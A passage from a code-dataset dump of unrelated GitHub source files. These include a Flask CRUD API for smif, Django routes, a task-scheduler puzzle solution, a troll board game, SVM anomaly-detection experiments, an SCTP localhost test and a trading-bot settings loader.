SosModelAPI(MethodView):\n \"\"\"Implement CRUD operations for sos_model configuration data\"\"\"\n\n def get(self, sos_model_name):\n \"\"\"Get sos_model\n all: GET /api/v1/sos_models/\n one: GET /api/vi/sos_models/name\n \"\"\"\n # return str(current_app.config)\n data_interface = current_app.config.data_interface\n\n try:\n if sos_model_name is None:\n data = []\n data = data_interface.read_sos_models()\n else:\n data = {}\n data = data_interface.read_sos_model(sos_model_name)\n\n response = jsonify({\"data\": data, \"error\": {}})\n except SmifException as err:\n response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n\n return response\n\n def post(self):\n \"\"\"Create a sos_model:\n POST /api/v1/sos_models\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n\n try:\n data_interface.write_sos_model(data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 201\n return response\n\n def put(self, sos_model_name):\n \"\"\"Update a sos_model:\n PUT /api/v1/sos_models\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n\n try:\n data_interface.update_sos_model(sos_model_name, data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 200\n return response\n\n def delete(self, sos_model_name):\n \"\"\"Delete a sos_model:\n DELETE /api/v1/sos_models\n \"\"\"\n data_interface = current_app.config.data_interface\n data_interface.delete_sos_model(sos_model_name)\n response = jsonify({})\n return response\n\n\nclass SectorModelAPI(MethodView):\n \"\"\"Implement CRUD operations for sector_model configuration data\"\"\"\n\n def get(self, sector_model_name):\n \"\"\"Get sector_models\n all: GET /api/v1/sector_models/\n one: GET /api/vi/sector_models/name\n \"\"\"\n # return str(current_app.config)\n data_interface = current_app.config.data_interface\n\n try:\n if sector_model_name is None:\n data = []\n data = data_interface.read_models(skip_coords=True)\n else:\n data = {}\n data = data_interface.read_model(sector_model_name, skip_coords=True)\n\n response = jsonify({\"data\": data, \"error\": {}})\n except SmifException as err:\n response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n return response\n\n def post(self):\n \"\"\"Create a sector_model:\n POST /api/v1/sector_models\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n data = check_timestamp(data)\n\n try:\n data_interface.write_model(data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 201\n return response\n\n def put(self, sector_model_name):\n \"\"\"Update a sector_model:\n PUT /api/v1/sector_models\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n data = check_timestamp(data)\n\n try:\n data_interface.update_model(sector_model_name, data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 200\n return response\n\n def delete(self, sector_model_name):\n \"\"\"Delete a sector_model:\n DELETE /api/v1/sector_models\n \"\"\"\n data_interface = current_app.config.data_interface\n data_interface.delete_model(sector_model_name)\n response = jsonify({})\n return response\n\n\nclass ScenarioAPI(MethodView):\n \"\"\"Implement CRUD operations for scenarios configuration data\"\"\"\n\n def get(self, scenario_name):\n \"\"\"Get scenarios\n all: GET /api/v1/scenarios/\n one: GET /api/vi/scenarios/name\n \"\"\"\n # return str(current_app.config)\n data_interface = current_app.config.data_interface\n\n try:\n if scenario_name is None:\n data = []\n data = data_interface.read_scenarios(skip_coords=True)\n else:\n data = {}\n data = data_interface.read_scenario(scenario_name, skip_coords=True)\n\n response = jsonify({\"data\": data, \"error\": {}})\n except SmifException as err:\n response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n\n return response\n\n def post(self):\n \"\"\"Create a scenario:\n POST /api/v1/scenarios\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n\n try:\n data = check_timestamp(data)\n data_interface.write_scenario(data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 201\n return response\n\n def put(self, scenario_name):\n \"\"\"Update a scenario:\n PUT /api/v1/scenarios\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n\n try:\n data = check_timestamp(data)\n data_interface.update_scenario(scenario_name, data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 200\n return response\n\n def delete(self, scenario_name):\n \"\"\"Delete a scenario:\n DELETE /api/v1/scenarios\n \"\"\"\n data_interface = current_app.config.data_interface\n data_interface.delete_scenario(scenario_name)\n response = jsonify({})\n return response\n\n\nclass DimensionAPI(MethodView):\n \"\"\"Implement CRUD operations for dimensions configuration data\"\"\"\n\n def get(self, dimension_name):\n \"\"\"Get dimensions\n all: GET /api/v1/dimensions/\n one: GET /api/vi/dimensions/name\n \"\"\"\n # return str(current_app.config)\n data_interface = current_app.config.data_interface\n\n try:\n if dimension_name is None:\n data = []\n data = data_interface.read_dimensions(skip_coords=True)\n else:\n data = {}\n data = data_interface.read_dimension(dimension_name, skip_coords=True)\n\n response = jsonify({\"data\": data, \"error\": {}})\n except SmifException as err:\n response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n\n return response\n\n def post(self):\n \"\"\"Create a dimension:\n POST /api/v1/dimensions\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n\n try:\n data = check_timestamp(data)\n data_interface.write_dimension(data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 201\n return response\n\n def put(self, dimension_name):\n \"\"\"Update a dimension:\n PUT /api/v1/dimensions\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n\n try:\n data = check_timestamp(data)\n data_interface.update_dimension(dimension_name, data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 200\n return response\n\n def delete(self, dimension_name):\n \"\"\"Delete a dimension:\n DELETE /api/v1/dimensions\n \"\"\"\n data_interface = current_app.config.data_interface\n data_interface.delete_dimension(dimension_name)\n response = jsonify({})\n return response\n\n\ndef check_timestamp(data):\n \"\"\"Check for timestamp and parse to datetime object\"\"\"\n if \"stamp\" in data:\n try:\n data[\"stamp\"] = dateutil.parser.parse(data[\"stamp\"])\n except (ValueError):\n pass\n return data\n\n\ndef parse_exceptions(exception):\n \"\"\"Parse a group of exceptions so that it can be sent over\n the http-api\n \"\"\"\n if type(exception) == SmifDataError:\n msg = defaultdict(list)\n for ex in exception.args[0]:\n msg[str(type(ex).__name__)].append(_parse_exception(ex))\n else:\n msg = {}\n msg[str(type(exception).__name__)] = [_parse_exception(exception)]\n\n return msg\n\n\ndef _parse_exception(ex):\n \"\"\"Parse a single exception so that it can be sent over\n the http-api\n \"\"\"\n if type(ex) == SmifValidationError:\n msg = ex.args[0]\n if type(ex) == SmifDataInputError:\n msg = {\n \"component\": ex.component,\n \"error\": ex.error,\n \"message\": ex.message,\n }\n if type(ex) == SmifDataNotFoundError:\n msg = ex.args[0]\n return msg\n","repo_name":"nismod/smif","sub_path":"src/smif/http_api/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":15681,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"39818844680","text":"from django.urls import path\n\nfrom Todo.views import (\n ToDoListAPI,\n ToDoDetailAPI,\n ToDoOrderChangingAPI,\n CompletedListAPI,\n CompletedDetailAPI,\n CompletedTodayListAPI,\n CategoryListAPI,\n CategoryDetailAPI,\n)\n\nurlpatterns = [\n path(\"\", ToDoListAPI.as_view()),\n path(\"/category\", CategoryListAPI.as_view()),\n path(\"/category/\", CategoryDetailAPI.as_view()),\n path(\"/\", ToDoDetailAPI.as_view()),\n path(\"/change-order-number\", ToDoOrderChangingAPI.as_view()),\n path(\"/completed\", CompletedListAPI.as_view()),\n path(\"/completed/today\", CompletedTodayListAPI.as_view()),\n path(\"/completed/\", CompletedDetailAPI.as_view()),\n]","repo_name":"cwadven/React-ToDo-List-Backend","sub_path":"Todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22212458497","text":"class Solution:\n\tdef leastInterval(self, tasks: List[str], n: int) -> int:\n\t\tif n == 0: \n\t\t\treturn len(tasks)\n\t\tfrequency = Counter(tasks)\n\n\t\thf = max(frequency.values())\n\n\t\tcount = 0\n\t\tfor task, occ in frequency.items():\n\t\t\tif occ == hf:\n\t\t\t\tcount += 1\n\n\n\t\tgap = (hf-1)*(n+1) + count\n\n\t\treturn max(gap, len(tasks))","repo_name":"AyushSingh-github/Leetcode","sub_path":"621-task-scheduler/621-task-scheduler.py","file_name":"621-task-scheduler.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29494675750","text":"# module qui met en place l'ensemble de l'environnement du jeu du troll, ainsi que le lancement des parties\nimport Strategies as strat\n\nclass Plateau : #Objet qui va contenir une situation de jeu (nombre de pierres pour chaque joueur, nombre de cases, position du troll.\n nbCases = 7\n posTroll = 4\n nbPierresJoueur1 = 15\n nbPierresJoueur2 = 15\n\n\n def __init__(self, _nbCases, _posTrollDepart, _pierresJ1Depart, _pierresJ2Depart):\n self.nbCases = _nbCases\n self.posTroll = _posTrollDepart\n self.nbPierresJoueur1 = _pierresJ1Depart\n self.nbPierresJoueur2 = _pierresJ2Depart\n\n\n\n\n\n\n\ndef Partie(mode,_nbCases,_posTrollDepart,_pierresJ1Depart,_pierresJ2Depart,CoupsJ1 = [],CoupsJ2 = []) : # Lancement d'une partie en fonction du mode de jeu (combien de joueurs), des differents parametres de jeu et de deux tableaux, en reference, pour l'historique des coups joues\n plateau = Plateau(_nbCases,_posTrollDepart,_pierresJ1Depart,_pierresJ2Depart)\n print(plateau.nbCases,\" \",plateau.posTroll,\" \",plateau.nbPierresJoueur1,\" \",plateau.nbPierresJoueur2) # affichage de la situation initiale\n fin = False\n while not fin :\n print(plateau.nbCases, \"cases, Troll a la position : \", plateau.posTroll, \" J1 : \",plateau.nbPierresJoueur1,\" pierres, J2 : \",plateau.nbPierresJoueur2,\" pierres\") #affichage de la situation courante\n\n if mode < 2 : # La variable \"mode\" de la Partie : 0 = 2 joueurs, 1 = 1 joueur face a une IA, 2 = 2 IAs.\n bon = False\n while not bon :\n print(\"Joueur 1, rentrez une valeur !\")\n StrCoupJ1 = input()\n try : #saisie du coup par le joueur 1\n CoupJ1 = int(StrCoupJ1)\n if CoupJ1 <= plateau.nbPierresJoueur1 and CoupJ1 > 0 :\n bon = True\n except ValueError:\n print(\"entrez une valeur entiere svp\")\n CoupsJ1.append(CoupJ1)\n else : # si ce n'est pas un joueur, il faut appeler une fonction qui renvoie le nombre de pierres lancees, elle sont dans le module Strategies.\n #CoupJ1 = strat.StrategieAleatoire(plateau.nbPierresJoueur1)\n CoupJ1 = strat.StrategiePrudente(plateau.nbPierresJoueur1,plateau.nbPierresJoueur2,plateau.nbCases,plateau.posTroll)\n #CoupJ1 = strat.StrategieContreExercice3(_pierresJ1Depart,plateau.nbPierresJoueur1)\n #CoupJ1 = strat.StrategieAgressive(_pierresJ1Depart,plateau.nbCases,plateau.nbPierresJoueur1)\n #CoupJ1 = strat.Strategie1(15,7,plateau.nbPierresJoueur1,plateau.nbPierresJoueur2,plateau.posTroll,1)\n CoupsJ1.append(CoupJ1)\n\n if mode == 0 :\n bon = False\n while not bon :\n print(\"Joueur 2, rentrez une valeur !\")\n StrCoupJ2 = input()\n try : #saisie du coup par le joueur 2\n CoupJ2 = int(StrCoupJ2)\n if CoupJ2 <= plateau.nbPierresJoueur2 and CoupJ2 > 0 :\n bon = True\n except ValueError:\n print(\"entrez une valeur entiere svp\")\n CoupsJ2.append(CoupJ2)\n else : # si ce n'est pas un joueur, il faut appeler une fonction qui renvoie le nombre de pierres lancees, elle sont dans le module Strategies.\n #CoupJ2 = strat.StrategieAgressive(_pierresJ2Depart,plateau.nbCases,plateau.nbPierresJoueur2)\n #CoupJ2 = strat.StrategieAleatoireExercice3(plateau.nbPierresJoueur2)\n CoupJ2 = strat.StrategieContreExercice3(_pierresJ2Depart,plateau.nbPierresJoueur2)\n #CoupJ2 = strat.StrategiePrudenteJ2(plateau.nbPierresJoueur1,plateau.nbPierresJoueur2,plateau.nbCases,plateau.posTroll)\n #CoupJ2 = strat.Strategie1(15,7,plateau.nbPierresJoueur2,plateau.nbPierresJoueur1,plateau.posTroll,2)\n #CoupJ2 = strat.StrategiePrudenteNonLineaireJ2(plateau.nbPierresJoueur1,plateau.nbPierresJoueur2,plateau.nbCases,plateau.posTroll)\n CoupsJ2.append(CoupJ2)\n plateau.nbPierresJoueur1 -= CoupJ1\n plateau.nbPierresJoueur2 -= CoupJ2\n if CoupJ1 > CoupJ2:\n plateau.posTroll += 1 \n elif CoupJ1 < CoupJ2:\n plateau.posTroll -= 1 \n if (plateau.nbPierresJoueur1 <= 0 or plateau.nbPierresJoueur2 <= 0 or plateau.posTroll == plateau.nbCases or plateau.posTroll == 1) : # Si un joueur n'a plus de pierre, ou si le troll est arrive a destination, la partie s'arrete. \n fin = True\n return ElectionJoueurGagnant(plateau) # 1 = joueur 1 a gagne, 2 = joueur 2 a gagne, 0 = match nul\n\n\n\ndef ElectionJoueurGagnant (plateau) : \n if plateau.posTroll == 1 : # conditions de victoire en fonction de la position du troll\n print(\"Joueur 2 gagne ! \")\n return 2\n elif plateau.posTroll == plateau.nbCases :\n print(\"Joueur 1 gagne ! \")\n return 1\n else : # si le troll n'est pas arrive a destination, deplacement du troll en fonction du reste de pierres de chaque joueur, puis election du vainqueur en fonction de la position finale du troll.\n if plateau.nbPierresJoueur1 <= 0 :\n plateau.posTroll -= plateau.nbPierresJoueur2\n elif plateau.nbPierresJoueur2 <= 0 :\n plateau.posTroll += plateau.nbPierresJoueur1\n print(\"Troll position : \",plateau.posTroll)\n if plateau.posTroll <= plateau.nbCases//2 :\n print(\"Joueur 2 gagne !\")\n return 2\n elif plateau.posTroll == (plateau.nbCases//2) + 1 :\n print(\"Match nul !\")\n return 0\n else :\n print(\"Joueur 1 gagne !\")\n return 1\n\n\ndef ConfigPartie(CoupsJ1 = [],CoupsJ2 = []) : # Configuration complete d'une partie par un terminal. Il est possible de passer cette etape et de directement appeler la fonction Partie.\n bon = False\n bonModeDeJeu = False\n bonJoueur1 = False\n bonCases = False\n bonTroll = False\n bonJoueur2 = False\n while not bon :\n while not bonModeDeJeu : \n print(\"selection mode de jeu : 0 = 2 joueurs, 1 = joueur VS IA, 2 = IA VS IA \")\n SelectModeDeJeu = input()\n try :\n SMDJ = int(SelectModeDeJeu)\n if SMDJ >= 0 and SMDJ <= 2 :\n bonModeDeJeu = True\n except ValueError:\n print(\"0 = 2 joueurs, 1 = joueur VS IA, 2 = IA VS IA\")\n while not bonCases : \n print(\"selection du nombre de cases de la partie\")\n cases = input()\n try :\n nbCases = int(cases)\n if nbCases >= 3 :\n bonCases = True\n except ValueError:\n print(\"Error\")\n\n while not bonTroll : \n print(\"selection de la position initiale du troll\")\n troll = input()\n try :\n posTroll = int(troll)\n if posTroll > 1 and posTroll < nbCases :\n bonTroll = True\n except ValueError:\n print(\"Error\")\n\n while not bonJoueur1 : \n print(\"selection du nombre de pierres pour le joueur 1\")\n pierresJoueur1 = input()\n try :\n nbPierresJoueur1 = int(pierresJoueur1)\n if nbPierresJoueur1 >= 1 :\n bonJoueur1 = True\n except ValueError:\n print(\"Error\")\n \n while not bonJoueur2 : \n print(\"selection du nombre de pierres pour le joueur 2\")\n pierresJoueur2 = input()\n try :\n nbPierresJoueur2 = int(pierresJoueur2)\n if nbPierresJoueur2 >= 1 :\n bonJoueur2 = True\n except ValueError:\n print(\"Error\")\n bon = bonCases and bonModeDeJeu and bonTroll and bonJoueur1 and bonJoueur2\n \n return Partie(SMDJ,nbCases,posTroll,nbPierresJoueur1,nbPierresJoueur2, CoupsJ1, CoupsJ2)\n","repo_name":"Asriell/TrollETChateau","sub_path":"JeuDuTroll/JeuDuTroll.py","file_name":"JeuDuTroll.py","file_ext":"py","file_size_in_byte":7953,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18975309805","text":"import csv\nimport random\n\nINDEX_CLASS_ID = 4\n# This script extract from an exported ammod csv a ballanced dataset,\n# smallest amount samples of a class defines amount for all other classes\nDATA_FILEPATH = \"/home/tsa/projects/libro-animalis/data/exported/210812_AMMOD_25Classes/ammod-multi-val.csv\"\nCLASS_FILEPATH = \"ammod-class-list.csv\"\nwith open(CLASS_FILEPATH) as classFile, open(DATA_FILEPATH) as dataFile:\n dataframe = csv.reader(dataFile, delimiter=\";\", quotechar=\"|\",)\n fieldnames = dataframe.__next__()\n classlist = csv.reader(classFile, delimiter=\";\", quotechar=\"|\",)\n classlist.__next__()\n classIds = []\n for x in classlist:\n classIds.append(x[0])\n\n dictClassIds = {i: [] for i in classIds}\n\n for x in dataframe:\n if(x[INDEX_CLASS_ID] == 'annotation_interval'):\n continue\n dictClassIds[x[INDEX_CLASS_ID]].append(x)\n # print(dictClassIds)\n# get min length of class\nmin_length = dataframe.line_num\nfor key in dictClassIds:\n if len(dictClassIds[key]) < min_length:\n print(key, \"->\", len(dictClassIds[key]))\n min_length = len(dictClassIds[key])\ncounter = 0\nfor key in dictClassIds:\n print('{} {}: {}'.format(counter, key,len(dictClassIds[key])))\n counter +=1\nresult = []\nfor key in dictClassIds:\n random.shuffle(dictClassIds[key])\n result.extend(dictClassIds[key][:min_length])\n\nwith open(\"balanced_labels.csv\", \"w\", newline=\"\") as csvfile:\n writer = csv.writer(csvfile, delimiter=\";\", quotechar=\"|\",)\n writer.writerow(fieldnames)\n writer.writerows(result)\n","repo_name":"hdogan84/database","sub_path":"src/extract_balanced_set.py","file_name":"extract_balanced_set.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41492304441","text":"#!/usr/bin/env python3.7\n\nfrom encode import create_vectors\nfrom sklearn.svm import OneClassSVM\nfrom sklearn.svm import SVC\nfrom reader import get_traces\nimport numpy as np\nimport os\nimport re\nfrom random import shuffle\n\n\ndef one_class(log_name, vectors, train, test, normal_traces, output_file):\n nus = [0.05, 0.1, 0.3, 0.5]\n\n for nu in nus:\n print(log_name, nu)\n ocsvm = OneClassSVM(kernel='linear', nu=nu)\n ocsvm.fit(train)\n classes = list(ocsvm.predict(test))\n\n anom_cases = [vectors[k] for k, x in enumerate(classes) if x == -1]\n normal_cases = [vectors[k] for k, x in enumerate(classes) if x == 1]\n\n anom_checked = [is_normal(t, normal_traces) for t in anom_cases]\n normal_checked = [is_normal(t, normal_traces) for t in normal_cases]\n\n print(log_name, \n \"oc\", \n len(anom_checked), \n anom_checked.count(True), \n anom_checked.count(False), \n len(normal_checked), \n normal_checked.count(True), \n normal_checked.count(False),\n nu, file=output_file, sep=\",\")\n\n\ndef supervised(log_name, vectors, train, test, normal_traces, labels, output_file):\n\n svc = SVC(kernel='linear')\n svc.fit(train, labels)\n classes = list(svc.predict(test))\n\n anom_cases = [vectors[k] for k, x in enumerate(classes) if x == -1]\n normal_cases = [vectors[k] for k, x in enumerate(classes) if x == 1]\n\n anom_checked = [is_normal(t, normal_traces) for t in anom_cases]\n normal_checked = [is_normal(t, normal_traces) for t in normal_cases]\n print(log_name, \n \"sv\", \n len(anom_checked), \n anom_checked.count(True), \n anom_checked.count(False), \n len(normal_checked), \n normal_checked.count(True), \n normal_checked.count(False),\n -1, file=output_file, sep=\",\")\n\n\ndef batch(output_name):\n normal_traces1 = [line.strip('\\n') for line in open(\"normal_pn1.txt\", 'r')]\n normal_traces2 = [line.strip('\\n') for line in open(\"normal_pn2.txt\", 'r')]\n output_file = open(\"outputs/\" + output_name + \".csv\", \"w+\")\n print(\"log,method,size0,normal0,anom0,size1,normal1,anom1,nu\", file=output_file)\n for filename in os.listdir(\"logs\"):\n filename = re.sub(r\"\\.csv$\", \"\", filename)\n\n if filename == \"xes\": continue\n\n vectors = get_traces(\"logs/\" + filename + \".csv\")\n shuffle(vectors)\n v = create_vectors(\"models_size16/\" + filename + \".model\", vectors)\n\n\n limit = int(len(vectors) * 0.7)\n train, test = v[:limit], v[limit:]\n \n\n if filename.startswith(\"log1\"):\n labels = np.array([1 if is_normal(trace, normal_traces1) else -1 for trace in vectors[:limit]])\n one_class(filename, vectors, train, test, normal_traces1, output_file)\n if filename != \"log1\": supervised(filename, vectors, train, test, normal_traces1, labels, output_file)\n elif filename.startswith(\"log2\"):\n labels = np.array([1 if is_normal(trace, normal_traces2) else -1 for trace in vectors[:limit]])\n one_class(filename, vectors, train, test, normal_traces2, output_file)\n if filename != \"log2\": supervised(filename, vectors, train, test, normal_traces2, labels, output_file)\n\n\ndef is_normal(vector, normal_traces):\n # if true, it is a normal behaviour\n return \" \".join(vector) in normal_traces\n\n\nfor i in range(1,11):\n batch(\"output\" + str(i))\n","repo_name":"n0mori/tcc","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39699059047","text":"from tkinter import *\n\nmaster = Tk()\n\ndef callback():\n print(\"click!\")\n\nframe = Frame(master) # Crear un contenedor (marco)\nframe.pack()\n\nb = Button(frame, text=\"OK\", command=callback, padx=132, pady=132,\n activebackground=\"green\", activeforeground=\"yellow\",\n background=\"black\", foreground=\"red\")\nb.pack(side=LEFT) # Empaquetar el botón a la izquierda dentro del contenedor\n\na = Button(frame, text=\"OK\", command=callback, padx=132, pady=132,\n state=DISABLED, background=\"black\", disabledforeground=\"blue\")\na.pack(side=LEFT) # Empaquetar el segundo botón a la izquierda dentro del contenedor\n\nmainloop()\n","repo_name":"ricardodure/cursopython","sub_path":"labmio/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32894881517","text":"from src.simulation import simulate_data\nimport torch\nimport numpy as np\nimport random\nimport os\n\nn_genes = 50\nn_cells = 20\n\nif not os.path.isdir('data/shared/'):\n os.makedirs('data/shared/')\n\nfor i in range(10):\n for intensity_scale in [50, 100, 200, 300, 400]:\n torch.manual_seed(i)\n np.random.seed(i)\n random.seed(i)\n\n data = simulate_data(\n n_genes=n_genes,\n n_cells=n_cells,\n n_factors=3,\n factor_images_dir='factors/',\n intensity_scales=torch.tensor([intensity_scale]).repeat(n_cells, n_genes),\n weight_sparsity=0.7,\n )\n\n torch.save(\n data,\n 'data/shared/{}_{}.pt'.format(i, intensity_scale)\n )","repo_name":"bioFAM/FISHFactor","sub_path":"data/simulated/simulate_shared.py","file_name":"simulate_shared.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"70718062247","text":"import _sctp\nimport sctp\nfrom sctp import *\nimport time\n\nclient = \"127.0.0.1\"\nserver = \"127.0.0.1\" \ntcpport = 10000\n\nif _sctp.getconstant(\"IPPROTO_SCTP\") != 132:\n\traise(Exception(\"getconstant failed\"))\ntcp = sctpsocket_tcp(socket.AF_INET)\n\nsaddr = (server, tcpport)\n \nprint(\"TCP %r ----------------------------------------------\" % (saddr, ))\n\ntcp.initparams.max_instreams = 3\ntcp.initparams.num_ostreams = 3\n\ntcp.events.clear()\ntcp.events.data_io = 1\n\ntcp.connect(saddr)\n\ntcp.sctp_send(b\"ABCDEF: TEST SUCCEEDED (test_local_cnx.py (C) 2009 Philippe Langlois)\\n\\l\")\nwhile 1:\n fromaddr, flags, msgret, notif = tcp.sctp_recv(1000)\n print(\" Msg arrived, flag %d\" % flags)\n\n if flags & FLAG_NOTIFICATION:\n raise(Exception(\"We did not subscribe to receive notifications!\"))\n #else:\n print(\"%s\" % msgret)\n\ntcp.close()\n","repo_name":"P1sec/pysctp","sub_path":"test_local_cnx.py","file_name":"test_local_cnx.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"53"} +{"seq_id":"12906626766","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport yaml\nimport logging\nimport inspect\nimport datetime\nimport calendar\nfrom sqlalchemy import create_engine\nfrom alchemysession import AlchemySessionContainer\nfrom PIL import Image, ImageDraw, ImageFont\n\nPYTHON_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))\nsys.path.append(PYTHON_PATH)\nos.environ[\"PYTHONUNBUFFERED\"] = \"1\"\n\nPROJECT_HOME_DIR, i_filename = os.path.split(__file__)\n# print(f'##### {PROJECT_HOME_DIR}:{i_filename}')\nconf_dir = f'{PROJECT_HOME_DIR}/config/'\nconf = yaml.safe_load(open(f'{PROJECT_HOME_DIR}/config/settings.yaml'))\n\nIS_RUN_LOCAL = False\nif os.path.exists(conf_dir+'local.conf'):\n IS_RUN_LOCAL = True\n print(\"Run local!!\")\n\nLOGS_PATH = PROJECT_HOME_DIR + '/logs/'\nLOGS = conf['PATHS']['LOGS']\n\n\nWEBDRIVER = conf['PATHS']['WEBDRIVER']\nIMAGES_OUT_PATH = conf['PATHS']['IMAGES_OUT_PATH']\nRESULTS_PATH = conf['PATHS']['RESULTS_PATH']\nETF_HOLDINGS_URL = conf['PATHS']['ETF_HOLDINGS_URL']\n\nEOD_API_KEY = conf['EODHISTOCICALDATA']['API_KEY']\n\n# ============================== Common Settings ======================\nMONTH_FREE_REQUEST_LIMIT = conf['COMMON_SETTINGS']['MONTH_FREE_REQUEST_LIMIT']\nPORTFOLIO_FREE_SIZE_LIMIT = conf['COMMON_SETTINGS']['PORTFOLIO_FREE_SIZE_LIMIT']\nPORTFOLIO_NEW_USER_SIZE_LIMIT = conf['COMMON_SETTINGS']['PORTFOLIO_NEW_USER_SIZE_LIMIT']\nPORTFOLIO_VIP_USER_SIZE_LIMIT = conf['COMMON_SETTINGS']['PORTFOLIO_VIP_USER_SIZE_LIMIT']\nNEW_USER_TRIAL_PERIOD = conf['COMMON_SETTINGS']['NEW_USER_TRIAL_PERIOD']\nNEW_USER_FREE_REQUEST_PERIOD = conf['COMMON_SETTINGS']['NEW_USER_FREE_REQUEST_PERIOD']\n\n# ============================== Quote Loader ======================\n\nDEFAULT_START_QUOTES_DATE = SQL_USER = conf['SQL']['DEFAULT_START_QUOTES_DATE']\nUNIVERSE_TABLE_NAME = conf['SQL_TABLE_NAMES']['UNIVERSE_TABLE_NAME']\nHIST_UNIVERSE_TABLE_NAME = conf['SQL_TABLE_NAMES']['HIST_UNIVERSE_TABLE_NAME']\nTINKOFF_UNIVERSE_TABLE_NAME = conf['SQL_TABLE_NAMES']['TINKOFF_UNIVERSE_TABLE_NAME']\nTINKOFF_HIST_UNIVERSE_TABLE_NAME = conf['SQL_TABLE_NAMES']['TINKOFF_HIST_UNIVERSE_TABLE_NAME']\nQUOTE_TABLE_NAME = conf['SQL_TABLE_NAMES']['QUOTE_TABLE_NAME']\nPORTFOLIO_ALLOCATION_TABLE_NAME = conf['SQL_TABLE_NAMES']['PORTFOLIO_ALLOCATION_TABLE_NAME']\nHIST_PORT_ALLOCATION_TABLE_NAME = conf['SQL_TABLE_NAMES']['HIST_PORT_ALLOCATION_TABLE_NAME']\nPORTFOLIO_RETURNS_TABLE_NAME = conf['SQL_TABLE_NAMES']['PORTFOLIO_RETURNS_TABLE_NAME']\nPORTFOLIO_BARS_TABLE_NAME = conf['SQL_TABLE_NAMES']['PORTFOLIO_BARS_TABLE_NAME']\nETF_FOR_SCRAPE = conf['ETF_FOR_SCRAPE']\nETFs = conf['ETFs']\nEXCLUDE_SECTORS = conf['EXCLUDE_SECTORS']\nEXCLUDE_TICKERS = conf['EXCLUDE_TICKERS']\nNOT_EXCLUDE_TICKERS = conf['NOT_EXCLUDE_TICKERS']\nVALID_EXCHANGE = conf['VALID_EXCHANGE']\nDELISTED_TICKERS = conf['DELISTED_TICKERS']\nRECENTLY_DELISTED = conf['RECENTLY_DELISTED']\nSIMFIN_PATH = \"\" + PROJECT_HOME_DIR + \"/\" + conf['PATHS']['SIMFIN_PATH']\nBENCHMARKS = conf['BENCHMARKS']\nBENCHMARKS_QUOTES_TABLE_NAME = conf['SQL_TABLE_NAMES']['BENCHMARKS_QUOTES_TABLE_NAME']\nCURRENCY_PRICE_TABLE_NAME = conf['SQL_TABLE_NAMES']['CURRENCY_PRICE_TABLE_NAME']\n\n# ============================== Portfolios ======================\n\nPARKING = conf['PORTFOLIOS']['PARKING']\nALL_WEATHER = conf['PORTFOLIOS']['ALL_WEATHER']\nBALANCED = conf['PORTFOLIOS']['BALANCED']\nAGGRESSIVE = conf['PORTFOLIOS']['AGGRESSIVE']\nLEVERAGED = conf['PORTFOLIOS']['LEVERAGED']\nTEST_ADM = 